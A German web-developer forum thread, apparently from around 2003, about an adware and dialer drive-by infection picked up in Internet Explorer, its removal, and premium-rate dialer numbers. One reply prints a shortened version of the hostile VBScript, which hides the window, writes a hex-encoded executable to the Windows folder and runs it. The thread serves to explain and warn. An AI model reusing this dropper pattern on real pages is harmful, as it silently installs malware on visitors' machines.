stvx: Verdammt, scheiß IE !!!!

tach forum,

So ein Mist aber auch. Habe ich gerade im IE gesurft (eigene Dummheit, muss ich sagen), und mir hier: http:// www.ntsearch.com/de_in.php?acc=zon anscheinend irgendwas eingebrockt. Diese Werbe-Seite hat auf jeden Fall ihr _dummes_ Tool installiert, obwohl ich ausdrücklich auf "nein" geklickt habe - und - na super..... W I E hat es denn das hinbekommen ?

Auf jeden Fall ist meine Frage: Wie bekomme ich das Scheißteil wieder weg ? thx,

euer stvx

  1. Moin!

    So ein Mist aber auch. Habe ich gerade im IE gesurft (eigene Dummheit, muss ich sagen), und mir hier: http:// www.ntsearch.com/de_in.php?acc=zon anscheinend irgendwas eingebrockt. Diese Werbe-Seite hat auf jeden Fall ihr _dummes_ Tool installiert, obwohl ich ausdrücklich auf "nein" geklickt habe - und - na super..... W I E hat es denn das hinbekommen ?

    Ich habe dein Posting mal entschärft. Es sollte zum guten Ton gehören, dass man hier im Forum KEINE Links auf potentiell schädliche Seiten setzt. Die URL angeben kann man meinetwegen, aber eben nicht als funktionierender Link. Denn der Müll kommt ins Archiv, und dort wird er von Google gefunden, und dann kommen noch mehr Leute da hin, wo du nicht hinwolltest.

    Was da passiert: Nach diversen Weiterleitungen will mein Browser (es ist nicht der IE ;), sondern der Opera) eine EXE runterladen. Klar, wenn ich in Opera einen Download abbreche, dann ist tatsächlich Schluß, und nichts passiert.

    Auf jeden Fall ist meine Frage: Wie bekomme ich das Scheißteil wieder weg ? thx,

    Es gibt diverse Dialer- und Adware-Bustersoftware, die nach allen bekannten Programmen sucht und die Komponenten entfernt. Stichwort "Ad-aware" oder "Search and Destroy" in Google sollten helfen.

    Und ansonsten lade dir am besten mal einen vernünftigen Browser runter, mit dem sowas nicht passiert. Der IE ist im Internet eigentlich Selbstmord - und du bist scheinbar kurz davor.

    - Sven Rautenberg

    --
    Die SelfHTML-Developer sagen Dankeschön für aktuell 20885,68 Euro Spendengelder!
    1. Hallo Sven,

      Und ansonsten lade dir am besten mal einen vernünftigen Browser runter, mit dem sowas nicht passiert. Der IE ist im Internet eigentlich Selbstmord - und du bist scheinbar kurz davor.

      Ich habe Opera 7 - und das ist spitze :-)

      habemeinennamenvergessen

      1. Moin!

        http://www.ntsearch.com/popengine/popup.php
        Da ist der Schädling.
        Ein VBS- Script, welches die so.exe schreibt.

        Ich hab das Skript mal zusammengekürzt:

        <HTML>
        <SCRIPT language=vbs>
         self.MoveTo 1500, 1500
         prog = prog & "4d,5a,90,00,03,00,00,00,04,00,00,00,ff,ff,00,00,b8,00,00,00,00,00,00,00,40,00,00,00,00,00,00,"
        ...
         prog = prog & "00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"
         tmp = Split(prog, ",")
         Set fso = CreateObject("Scripting.FileSystemObject")
         Set shell = CreateObject("WScript.Shell")
         folder = fso.GetSpecialFolder(0)
         path =  folder & "\sp.exe"
         Set f = fso.CreateTextFile(path, True)
         For i = 0 To UBound(tmp)
           l = Len(tmp(i))
           prog = Int("&H" & Left(tmp(i), 2))
           If l > 2 Then
             r = Int("&H" & Mid(tmp(i), 3, l))
             For j = 1 To r
               f.Write Chr(prog)
             Next
           Else
             f.Write Chr(prog)
           End If
         Next
         f.Close
         shell.Run(path)
         self.Close
        </SCRIPT>
        </HTML>

        Dieses Skript ist schlicht als kriminell zu bewerten. Es schreibt eine executable (sp.exe) und startet diese. Das die "freundlichen" Verschleuederer des Virus sich Ihrer kriminellen Tätigkeit bwust sind bweist deren Versteckspiel:  self.MoveTo 1500, 1500 soll das Browserfenster verschieben und kann das wohl auch. - Arme IE- Benutzer!

        MFFG (Mit freundlich- friedfertigem Grinsen)

        fastix®

        --
        Als Freiberufler bin ich immer auf der Suche nach Aufträgen: Schulungen, Development. Auch  für seriöse Agenturen.
        1. IE - Sicherheitslücke ?

          scheint wohl eine IE sicherheitslücke zu sein ...

          Tach auch,

          Set fso = CreateObject("Scripting.FileSystemObject")
           Set shell = CreateObject("WScript.Shell")

          Sofern ich weiß, nutzt das WSH - Windows Script Host - ActiveX-Objekte, und bei denen Fragt der Browser immer erst nach, befor einen Script damit hantieren lässt. Wieso macht er das bei dieser Seite nicht ???

          1. Moin!

            Sofern ich weiß, nutzt das WSH - Windows Script Host - ActiveX-Objekte, und bei denen Fragt der Browser immer erst nach, befor einen Script damit hantieren lässt. Wieso macht er das bei dieser Seite nicht ???

            Keine Ahnung, ob gefragt wird oder nicht. Ich werd mir das Skript nicht im IE antun. Zum Webbrowsen benutze ich selbigen Scheißdreck schon lange nicht mehr. Wozu auch? Mircosoft soll das Ding wegschmeissen und lange nachdenken, was da geliefert wird und ob es sinnvoll ist an diesen "Sicherheitskonzepten" festzuhalten.

            Eigentlich müssten die jedem Windowskäufer ein kostenloses Linux als Garantieleistung zu Hause vorbeibringen :)

            Das Office können sie ja portieren- aber bitte ohne IE.

            MFFG (Mit freundlich- friedfertigem Grinsen)

            fastix®

            --
            Als Freiberufler bin ich immer auf der Suche nach Aufträgen: Schulungen, Development. Auch  für seriöse Agenturen.
  2. Hallo,

    Warscheinlich hilft das
    http://board.protecus.de/showtopic.php?threadid=7408

    Grüße
    Jeena Paradies

    --
    Alkoholverbot in der gesammten Bamberger Innenstadt!
    http://www.jeenaparadies.de/alkoholverbot/
    1. Hallo Jeena,

      vielen, vielen dank für deinen Link, mein selbstmordbrowser ([pref:t=67895&m=388820]) ist nun endlich wieder von der Seuche befreit :-)

      Nun, aber was war das jetzt für ein Teil, was dieser schlimme Link ([pref:t=67895&m=388820]) gemacht hat ? Sicherheitsloch im IE ? Trojaner, Virus, ...? Nur zu meiner Information :-)

      stvx (dummer name, aber ich laufe irgenwie namenlos hierherum)

      1. Hi,

        Nun, aber was war das jetzt für ein Teil, was dieser schlimme Link ([pref:t=67895&m=388820]) gemacht hat ? Sicherheitsloch im IE ? Trojaner, Virus, ...? Nur zu meiner Information :-)

        also auf dieser (leer aussehenden) Seite sehe ich mit meinem IE (natürlich mit deaktiviertem ActiveScripting;-) einen sich selbst aufrufenden Link (vermutlich sogar Popup-Blocker resistent) auf http://connect.online-dialer.com/... Ich würde mal die nächste Telefonrechnung genauer unter die Lupe nehmen.

        Auf dieser Seite ist auch ein Hinweis: "REPORT A SPAMER or ILLEGAL USAGE e-mail aups@online-dialer.com", den ich vielleicht nutzen würde.

        freundliche Grüße
        Ingo

        1. Hallo alle,

          Ich würde mal die nächste Telefonrechnung genauer unter die Lupe nehmen...

          ich hätte zu diesem Thema Dialer mal gern ne Frage: Nutzen die nur 0190er Nummern oder auch andere? Ich habe bei mir alle 0190er Nummern sperren lassen. Ist das "sicher"?

          Gruß, Andreas
          und schönes Neujahrswochenende

          1. Hallo Andreas,

            ich hätte zu diesem Thema Dialer mal gern ne Frage: Nutzen die nur 0190er Nummern oder auch andere? Ich habe bei mir alle 0190er Nummern sperren lassen. Ist das "sicher"?

            Es gibt auch andere "Mehrwertdienste", z.B. die 0900er Vorwahl. Ob die allerdings zur Einwahl ins Netz genutzt werden kann, kann dir nur die http://www.telekom.de sagen.

            Grüße
            Torsten

            1. Hallo,

              Es gibt auch andere "Mehrwertdienste", z.B. die 0900er Vorwahl. Ob die allerdings zur Einwahl ins Netz genutzt werden kann, kann dir nur die http://www.telekom.de sagen.

              http://www.heise.de/newsticker/data/uma-13.12.03-002/

              Gruß,
              Henning

            2. Moin

              Es gibt auch andere "Mehrwertdienste", z.B. die 0900er Vorwahl. Ob die allerdings zur Einwahl ins Netz genutzt werden kann, kann dir nur die http://www.telekom.de sagen.

              Seit Anfang Dez ist es vorgeschrieben, dass Dialer ausschliesslich 0900 -9 Vorwahlen verwendet werden dürfen.
              Damit ist man mit 0190 nicht mehr auf der sicheren Seite.
              http://www.heise.de/newsticker/data/uma-13.12.03-002/

              Viele Grüße TomIRL

            3. Hallo Torsten,
              hallo Andreas,

              ich hätte zu diesem Thema Dialer mal gern ne Frage: Nutzen die nur 0190er Nummern oder auch andere? Ich habe bei mir alle 0190er Nummern sperren lassen. Ist das "sicher"?

              Es gibt auch andere "Mehrwertdienste", z.B. die 0900er Vorwahl. Ob die allerdings zur Einwahl ins Netz genutzt werden kann, kann dir nur die http://www.telekom.de sagen.

              Seit dem 14. Dezember darf für Dailer nur noch die Rufnummerngasse 09009 verwendet werden.
              Das hindert natürlich unseriöse Dailerbetreiber nicht, andere teure Nummern zu verwenden.

              Weiter Informationen und Nachrichten findet ihr unter http://www.dialerschutz.de/.

              MFG
              Detlef

              --
              - Wissen ist gut
              - Können ist besser
              - aber das Beste und Interessanteste ist der Weg dahin!